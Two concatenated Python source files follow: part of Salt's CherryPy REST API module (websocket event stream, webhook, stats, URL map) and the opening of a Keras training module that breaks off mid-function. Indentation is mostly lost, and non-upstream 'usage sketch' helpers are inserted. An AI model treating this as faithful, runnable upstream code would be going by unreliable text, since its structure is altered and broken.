'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
            var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
        The above examples show how to establish a websocket connection to Salt
        and activate real-time updates from Salt's event stream by signaling
        ``websocket client ready``.
'''
        # Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str('data: {0}\n\n').format(salt.utils.json.dumps(data)), # future lint: disable=blacklisted-function
False
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
    This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
                      revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
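# Hedged usage sketch (not part of the upstream Salt source): fire the hook
# above from Python rather than curl. The URL suffix and payload are
# illustrative; the resulting event tag would be
# salt/netapi/hook/mycompany/build/success, as described in the docstring.
def _example_fire_webhook(base_url='https://localhost:8000'):
    import requests  # assumption: not a dependency of this module
    resp = requests.post('{0}/hook/mycompany/build/success'.format(base_url),
                         json={'revision': 'aa22a3c4b2e7', 'result': True},
                         verify=False)
    return resp.json()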
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
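# Hedged usage sketch (not part of the upstream Salt source): one way
# get_app() could be wired into a standalone CherryPy process. ``opts`` must
# be a loaded Salt master configuration (an assumption of this sketch);
# salt-api normally performs this wiring itself.
def _example_serve(opts):
    root, _apiopts, cpyopts = get_app(opts)
    cherrypy.tree.mount(root, '/', config=cpyopts)
    cherrypy.engine.start()
    cherrypy.engine.block()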
|
training.py
|
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import objectives
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
def standardize_input_data(data, names, shapes=None,
check_batch_dim=True,
exception_prefix=''):
'''Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
'''
if type(data) is dict:
arrays = []
for name in names:
if name not in data:
raise Exception('No data provided for "' +
name + '". Need data for each key in: ' +
str(data.keys()))
arrays.append(data[name])
elif type(data) is list:
if len(data) != len(names):
if len(data) > 0 and hasattr(data[0], 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise Exception('Error when checking ' + exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise Exception('Error when checking ' + exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) != 1:
# case: model expects multiple inputs but only received
# a single Numpy array
raise Exception('The model expects ' + str(len(names)) +
' input arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# make arrays at least 2D
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# check shapes compatibility
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_dim:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise Exception('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
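# Hedged usage sketch (not part of the upstream Keras source):
# standardize_input_data() accepts a dict, a list, or a single array and
# always returns an ordered list of (at least 2D) arrays matching ``names``.
# The name 'main_input' is an illustrative assumption.
def _example_standardize_input_data():
    x = np.random.random((8, 3))
    # A single array is wrapped in a list and checked against the one name.
    as_single = standardize_input_data(x, ['main_input'], shapes=[(None, 3)])
    # A dict is reordered to follow the order given by ``names``.
    as_dict = standardize_input_data({'main_input': x}, ['main_input'])
    return as_single, as_dict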
def standardize_sample_or_class_weights(x_weight, output_names, weight_type):
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if type(x_weight) is list and len(x_weight) == 1:
return x_weight
if type(x_weight) is dict and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if type(x_weight) is list:
if len(x_weight) != len(output_names):
raise Exception('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
                            ' array per model output.')
return x_weight
if type(x_weight) is dict:
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise Exception('The model has multiple outputs, so `' +
weight_type + '` '
                        'should be either a list or a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def standardize_class_weights(class_weight, output_names):
return standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def standardize_sample_weights(sample_weight, output_names):
return standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def check_array_lengths(X, Y, W):
x_lengths = [x.shape[0] for x in X]
y_lengths = [y.shape[0] for y in Y]
w_lengths = [w.shape[0] for w in W]
set_x = set(x_lengths)
if len(set_x) != 1:
raise Exception('All input arrays (x) should have '
'the same number of samples.')
set_y = set(y_lengths)
if len(set_y) != 1:
raise Exception('All target arrays (y) should have '
'the same number of samples.')
set_w = set(w_lengths)
if len(set_w) != 1:
raise Exception('All sample_weight arrays should have '
'the same number of samples.')
if list(set_x)[0] != list(set_y)[0]:
raise Exception('Input arrays should have '
'the same number of samples as target arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_y)[0]) + ' target samples.')
if list(set_x)[0] != list(set_w)[0]:
raise Exception('Sample_weight arrays should have '
'the same number of samples as input arrays. Found ' +
str(list(set_x)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def check_loss_and_target_compatibility(targets, losses, output_shapes):
assert len(targets) == len(losses) == len(output_shapes)
    key_losses = {'mean_squared_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, losses, output_shapes):
if loss.__name__ == 'categorical_crossentropy':
if y.shape[1] == 1:
raise Exception('You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses and shape[1] is not None and y.shape[1] != shape[1]:
raise Exception('A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def collect_metrics(metrics, output_names):
if not metrics:
return [[] for _ in output_names]
if type(metrics) is list:
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif type(metrics) is dict:
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if type(output_metrics) is not list:
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise Exception('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def collect_trainable_weights(layer):
'''Collects all `trainable_weights` attributes,
    excluding any sublayers where `trainable` is set to `False`.
'''
trainable = getattr(layer, 'trainable', True)
if not trainable:
return []
weights = []
if layer.__class__.__name__ == 'Sequential':
for sublayer in layer.flattened_layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Model':
for sublayer in layer.layers:
weights += collect_trainable_weights(sublayer)
elif layer.__class__.__name__ == 'Graph':
for sublayer in layer._graph_nodes.values():
weights += collect_trainable_weights(sublayer)
else:
weights += layer.trainable_weights
# dedupe weights
weights = list(set(weights))
weights.sort(key=lambda x: x.name)
return weights
def batch_shuffle(index_array, batch_size):
'''This shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
'''
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def make_batches(size, batch_size):
'''Returns a list of batch indices (tuples of indices).
'''
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, nb_batch)]
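# Hedged usage sketch (not part of the upstream Keras source): make_batches()
# yields (start, stop) index pairs, while batch_shuffle() above keeps each
# batch contiguous and only shuffles the batch order.
def _example_batching():
    index_array = np.arange(10)
    batches = make_batches(10, batch_size=4)   # [(0, 4), (4, 8), (8, 10)]
    shuffled = batch_shuffle(index_array, batch_size=4)
    return batches, shuffled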
def slice_X(X, start=None, stop=None):
'''This takes an array-like, or a list of
array-likes, and outputs:
- X[start:stop] if X is an array-like
    - [x[start:stop] for x in X] if X is a list
Can also work on list/array of indices: `slice_X(x, indices)`
# Arguments:
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
'''
if type(X) == list:
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in X]
else:
return [x[start:stop] for x in X]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return X[start]
else:
return X[start:stop]
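# Hedged usage sketch (not part of the upstream Keras source): slice_X()
# slices a single array or every array in a list, either by a start/stop
# range or by an explicit list of indices.
def _example_slice_X():
    x = np.arange(20).reshape(10, 2)
    by_range = slice_X([x, x], 0, 5)     # two arrays of shape (5, 2)
    by_indices = slice_X(x, [0, 2, 4])   # rows 0, 2 and 4 of x
    return by_range, by_indices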
def weighted_objective(fn):
'''Transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
'''
def weighted(y_true, y_pred, weights, mask=None):
# score_array has ndim >= 2
score_array = fn(y_true, y_pred)
if mask is not None:
# Cast the mask to floatX to avoid float64 upcasting in theano
mask = K.cast(mask, K.floatx())
# mask should have the same shape as score_array
score_array *= mask
# the loss per batch should be proportional
# to the number of unmasked samples.
score_array /= K.mean(mask)
# reduce score_array to same ndim as weight array
ndim = K.ndim(score_array)
weight_ndim = K.ndim(weights)
score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
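# Hedged usage sketch (not part of the upstream Keras source): wrap a stock
# objective so it also accepts per-sample weights and an optional mask, then
# evaluate it on constant backend tensors.
def _example_weighted_objective():
    weighted_mse = weighted_objective(objectives.mean_squared_error)
    y_true = K.variable(np.array([[1.0], [0.0], [1.0]]))
    y_pred = K.variable(np.array([[0.9], [0.2], [0.4]]))
    weights = K.variable(np.array([1.0, 1.0, 2.0]))
    # Returns a scalar: the weighted mean of the per-sample squared errors.
    return K.eval(weighted_mse(y_true, y_pred, weights))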
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
'''Performs weight input validation and standardization
to a single sample-wise (or timestep-wise) weight array.
'''
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
            raise Exception('sample_weight_mode '
'should be None or "temporal". '
'Found: ' + str(sample_weight_mode))
if len(y.shape) < 3:
raise Exception('Found a sample_weight array for '
'an input with shape ' +
str(y.shape) + '. '
'Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise Exception('Found a sample_weight array with shape ' +
str(sample_weight.shape) + '. '
'In order to use timestep-wise sample weights, '
'you should specify sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
# TODO: proper error message
assert y.shape[:sample_weight.ndim] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise Exception('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],), dtype=K.floatx())
else:
return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
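# Hedged usage sketch (not part of the upstream Keras source): turn a
# class_weight dict into a per-sample weight array for one-hot targets.
def _example_standardize_weights():
    y = np.array([[1, 0], [0, 1], [0, 1]])   # one-hot targets for 2 classes
    return standardize_weights(y, class_weight={0: 1.0, 1: 5.0})
    # -> array([1., 5., 5.])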
def generator_queue(generator, max_q_size=10,
wait_time=0.05, nb_worker=1, pickle_safe=False):
'''Builds a queue out of a data generator.
If pickle_safe, use a multiprocessing approach. Else, use threading.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
'''
generator_threads = []
if pickle_safe:
q = multiprocessing.Queue(maxsize=max_q_size)
_stop = multiprocessing.Event()
else:
q = queue.Queue()
_stop = threading.Event()
try:
def data_generator_task():
while not _stop.is_set():
try:
if pickle_safe or q.qsize() < max_q_size:
generator_output = next(generator)
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
for i in range(nb_worker):
if pickle_safe:
                # Reset random seed else all child processes share the same seed
np.random.seed()
thread = multiprocessing.Process(target=data_generator_task)
else:
thread = threading.Thread(target=data_generator_task)
generator_threads.append(thread)
thread.daemon = True
thread.start()
except:
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
q.close()
raise
return q, _stop, generator_threads
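# Hedged usage sketch (not part of the upstream Keras source): build a
# background queue from a simple batch generator, drain a few batches, then
# signal the worker thread to stop.
def _example_generator_queue():
    def batch_generator():
        while True:
            yield np.random.random((4, 3)), np.random.random((4, 1))
    q, _stop, threads = generator_queue(batch_generator(), max_q_size=2)
    batches = [q.get() for _ in range(3)]
    _stop.set()
    return batches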
class Model(Container):
def compile(self, optimizer, loss, metrics=[], loss_weights=None,
sample_weight_mode=None, **kwargs):
'''Configures the model for training.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](/optimizers).
loss: str (name of objective function) or objective function.
See [objectives](/objectives).
If the model has multiple outputs, you can use a different loss
on each output by passing a dictionary or a list of objectives.
metrics: list of metrics to be evaluated by the model
during training and testing.
Typically you will use `metrics=['accuracy']`.
To specify different metrics for different outputs of a
multi-output model, you could also pass a dictionary,
such as `metrics={'output_a': 'accuracy'}`.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
kwargs: when using the Theano backend, these arguments
                are passed into K.function. Ignored for the TensorFlow backend.
'''
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = loss
self.loss_weights = loss_weights
# prepare loss weights
if loss_weights is None:
loss_weights_list = [1. for _ in range(len(self.outputs))]
elif type(loss_weights) is dict:
for name in loss_weights:
if name not in self.output_names:
raise Exception('Unknown entry in loss_weights '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_weights_list = []
for name in self.output_names:
loss_weights_list.append(loss_weights.get(name, 1.))
elif type(loss_weights) is list:
if len(loss_weights) != len(self.outputs):
raise Exception('When passing a list as loss_weights, '
                                'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss_weights=' +
str(loss_weights))
loss_weights_list = loss_weights
else:
raise Exception('Could not interpret loss_weights argument: ' +
str(loss_weights))
# prepare loss functions
if type(loss) is dict:
for name in loss:
if name not in self.output_names:
raise Exception('Unknown entry in loss '
'dictionary: "' + name + '". '
'Only expected the following keys: ' +
str(self.output_names))
loss_functions = []
for name in self.output_names:
if name not in loss:
raise Exception('Output "' + name +
'" missing from loss dictionary')
loss_functions.append(objectives.get(loss[name]))
elif type(loss) is list:
if len(loss) != len(self.outputs):
raise Exception('When passing a list as loss, '
                                'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed loss=' +
str(loss))
loss_functions = [objectives.get(l) for l in loss]
else:
loss_function = objectives.get(loss)
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [weighted_objective(fn) for fn in loss_functions]
# prepare output masks
masks = self.compute_mask(self.inputs, mask=None)
if masks is None:
masks = [None for _ in self.outputs]
if type(masks) is not list:
masks = [masks]
# prepare sample weights
if type(sample_weight_mode) is dict:
for name in sample_weight_mode:
if name not in self.output_names:
raise Exception('Unknown entry in '
'sample_weight_mode dictionary: "' +
name + '". '
'Only expected the following keys: ' +
str(self.output_names))
sample_weights = []
sample_weight_modes = []
for name in self.output_names:
if name not in sample_weight_mode:
raise Exception('Output "' + name +
'" missing from sample_weight_modes '
'dictionary')
if sample_weight_mode.get(name) == 'temporal':
weight = K.placeholder(ndim=2, name=name + '_sample_weights')
sample_weight_modes.append('temporal')
else:
weight = K.placeholder(ndim=1, name=name + '_sample_weights')
sample_weight_modes.append(None)
sample_weights.append(weight)
elif type(sample_weight_mode) is list:
if len(sample_weight_mode) != len(self.outputs):
raise Exception('When passing a list as sample_weight_mode, ' +
                                'it should have one entry per model output. '
'The model has ' + str(len(self.outputs)) +
' outputs, but you passed sample_weight_mode=' +
str(sample_weight_mode))
sample_weights = []
sample_weight_modes = []
